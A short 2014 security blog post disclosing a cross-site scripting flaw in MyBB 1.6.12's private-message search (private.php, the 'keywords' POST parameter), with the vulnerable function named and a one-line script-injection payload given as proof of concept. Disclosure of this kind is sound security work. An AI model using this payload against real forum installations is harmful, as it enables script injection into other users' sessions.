Mybb 1.6.12 XSS P0c

Posted by Saadi On Friday, 14 February 2014 2 comments
Hi , i didn't update the blog for some time as i was busy with some other stuff but now onward some cool stuff coming soon which i found but didn't publish them..

Mybb XSS ,  some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/

After reading the article and little reviewing the code i found same types of function were coded for searching private messages.

So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.

function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php

private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>

P0c


Moreover Mybb 1.8 alpha is also vuln on private.php..
So this is for today ;)

#Independent Pakistani Security Researcher

2 comments:

Post a Comment